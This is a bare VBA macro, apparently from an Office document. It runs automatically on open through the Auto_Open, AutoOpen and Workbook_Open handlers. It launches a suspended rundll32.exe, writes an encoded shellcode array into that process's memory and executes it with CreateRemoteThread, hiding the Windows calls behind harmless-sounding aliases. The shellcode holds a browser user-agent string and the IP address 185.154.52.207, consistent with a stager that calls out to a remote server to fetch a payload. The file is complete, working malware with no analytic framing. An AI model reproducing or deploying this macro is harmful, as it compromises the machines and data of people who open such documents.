Private Type PROCESS_INFORMATION hProcess As Long hThread As Long

1. Private Type PROCESS_INFORMATION
2. hProcess As Long
3. hThread As Long
4. dwProcessId As Long
5. dwThreadId As Long
6. End Type
7.  
8. Private Type STARTUPINFO
9. cb As Long
10. lpReserved As String
11. lpDesktop As String
12. lpTitle As String
13. dwX As Long
14. dwY As Long
15. dwXSize As Long
16. dwYSize As Long
17. dwXCountChars As Long
18. dwYCountChars As Long
19. dwFillAttribute As Long
20. dwFlags As Long
21. wShowWindow As Integer
22. cbReserved2 As Integer
23. lpReserved2 As Long
24. hStdInput As Long
25. hStdOutput As Long
26. hStdError As Long
27. End Type
28.  
29. #If VBA7 Then
30. Private Declare PtrSafe Function CreateStuff Lib "kernel32" Alias "CreateRemoteThread" (ByVal hProcess As Long, ByVal lpThreadAttributes As Long, ByVal dwStackSize As Long, ByVal lpStartAddress As LongPtr, lpParameter As Long, ByVal dwCreationFlags As Long, lpThreadID As Long) As LongPtr
31. Private Declare PtrSafe Function AllocStuff Lib "kernel32" Alias "VirtualAllocEx" (ByVal hProcess As Long, ByVal lpAddr As Long, ByVal lSize As Long, ByVal flAllocationType As Long, ByVal flProtect As Long) As LongPtr
32. Private Declare PtrSafe Function WriteStuff Lib "kernel32" Alias "WriteProcessMemory" (ByVal hProcess As Long, ByVal lDest As LongPtr, ByRef Source As Any, ByVal Length As Long, ByVal LengthWrote As LongPtr) As LongPtr
33. Private Declare PtrSafe Function RunStuff Lib "kernel32" Alias "CreateProcessA" (ByVal lpApplicationName As String, ByVal lpCommandLine As String, lpProcessAttributes As Any, lpThreadAttributes As Any, ByVal bInheritHandles As Long, ByVal dwCreationFlags As Long, lpEnvironment As Any, ByVal lpCurrentDirectory As String, lpStartupInfo As STARTUPINFO, lpProcessInformation As PROCESS_INFORMATION) As Long
34. #Else
35. Private Declare Function CreateStuff Lib "kernel32" Alias "CreateRemoteThread" (ByVal hProcess As Long, ByVal lpThreadAttributes As Long, ByVal dwStackSize As Long, ByVal lpStartAddress As Long, lpParameter As Long, ByVal dwCreationFlags As Long, lpThreadID As Long) As Long
36. Private Declare Function AllocStuff Lib "kernel32" Alias "VirtualAllocEx" (ByVal hProcess As Long, ByVal lpAddr As Long, ByVal lSize As Long, ByVal flAllocationType As Long, ByVal flProtect As Long) As Long
37. Private Declare Function WriteStuff Lib "kernel32" Alias "WriteProcessMemory" (ByVal hProcess As Long, ByVal lDest As Long, ByRef Source As Any, ByVal Length As Long, ByVal LengthWrote As Long) As Long
38. Private Declare Function RunStuff Lib "kernel32" Alias "CreateProcessA" (ByVal lpApplicationName As String, ByVal lpCommandLine As String, lpProcessAttributes As Any, lpThreadAttributes As Any, ByVal bInheritHandles As Long, ByVal dwCreationFlags As Long, lpEnvironment As Any, ByVal lpCurrentDriectory As String, lpStartupInfo As STARTUPINFO, lpProcessInformation As PROCESS_INFORMATION) As Long
39. #End If
40.  
41. Sub Auto_Open()
42. Dim myByte As Long, myArray As Variant, offset As Long
43. Dim pInfo As PROCESS_INFORMATION
44. Dim sInfo As STARTUPINFO
45. Dim sNull As String
46. Dim sProc As String
47.  
48. #If VBA7 Then
49. Dim rwxpage As LongPtr, res As LongPtr
50. #Else
51. Dim rwxpage As Long, res As Long
52. #End If
53. myArray = Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117,82,12,-117,82,20,-117,114,40,15,-73,74,38,49,-1,49,-64,-84, _
54. 60,97,124,2,44,32,-63,-49,13,1,-57,-30,-16,82,87,-117,82,16,-117,66,60,1,-48,-117,64,120,-123,-64,116,74,1,-48, _
55. 80,-117,72,24,-117,88,32,1,-45,-29,60,73,-117,52,-117,1,-42,49,-1,49,-64,-84,-63,-49,13,1,-57,56,-32,117,-12,3, _
56. 125,-8,59,125,36,117,-30,88,-117,88,36,1,-45,102,-117,12,75,-117,88,28,1,-45,-117,4,-117,1,-48,-119,68,36,36,91, _
57. 91,97,89,90,81,-1,-32,88,95,90,-117,18,-21,-122,93,104,110,101,116,0,104,119,105,110,105,84,104,76,119,38,7,-1, _
58. -43,-24,-128,0,0,0,77,111,122,105,108,108,97,47,53,46,48,32,40,99,111,109,112,97,116,105,98,108,101,59,32,77, _
59. 83,73,69,32,57,46,48,59,32,87,105,110,100,111,119,115,32,78,84,32,54,46,49,59,32,87,79,87,54,52,59,32, _
60. 84,114,105,100,101,110,116,47,53,46,48,59,32,66,79,73,69,57,59,69,78,85,83,41,0,88,88,88,88,88,88,88, _
61. 88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88, _
62. 88,88,88,88,88,0,89,49,-1,87,87,87,87,81,104,58,86,121,-89,-1,-43,-21,121,91,49,-55,81,81,106,3,81,81, _
63. 104,-69,1,0,0,83,80,104,87,-119,-97,-58,-1,-43,-21,98,89,49,-46,82,104,0,2,96,-124,82,82,82,81,82,80,104, _
64. -21,85,46,59,-1,-43,-119,-58,49,-1,87,87,87,87,86,104,45,6,24,123,-1,-43,-123,-64,116,68,49,-1,-123,-10,116,4, _
65. -119,-7,-21,9,104,-86,-59,-30,93,-1,-43,-119,-63,104,69,33,94,49,-1,-43,49,-1,87,106,7,81,86,80,104,-73,87,-32, _
66. 11,-1,-43,-65,0,47,0,0,57,-57,116,-68,49,-1,-21,21,-21,73,-24,-103,-1,-1,-1,47,101,81,98,68,0,0,104,-16, _
67. -75,-94,86,-1,-43,106,64,104,0,16,0,0,104,0,0,64,0,87,104,88,-92,83,-27,-1,-43,-109,83,83,-119,-25,87,104, _
68. 0,32,0,0,83,86,104,18,-106,-119,-30,-1,-43,-123,-64,116,-51,-117,7,1,-61,-123,-64,117,-27,88,-61,-24,55,-1,-1,-1, _
69. 49,56,53,46,49,53,52,46,53,50,46,50,48,55,0)
70. If Len(Environ("ProgramW6432")) > 0 Then
71. sProc = Environ("windir") & "\\SysWOW64\\rundll32.exe"
72. Else
73. sProc = Environ("windir") & "\\System32\\rundll32.exe"
74. End If
75.  
76. res = RunStuff(sNull, sProc, ByVal 0&, ByVal 0&, ByVal 1&, ByVal 4&, ByVal 0&, sNull, sInfo, pInfo)
77.  
78. rwxpage = AllocStuff(pInfo.hProcess, 0, UBound(myArray), &H1000, &H40)
79. For offset = LBound(myArray) To UBound(myArray)
80. myByte = myArray(offset)
81. res = WriteStuff(pInfo.hProcess, rwxpage + offset, myByte, 1, ByVal 0&)
82. Next offset
83. res = CreateStuff(pInfo.hProcess, 0, 0, rwxpage, 0, 0, 0)
84. End Sub
85. Sub AutoOpen()
86. Auto_Open
87. End Sub
88. Sub Workbook_Open()
89. Auto_Open
90. End Sub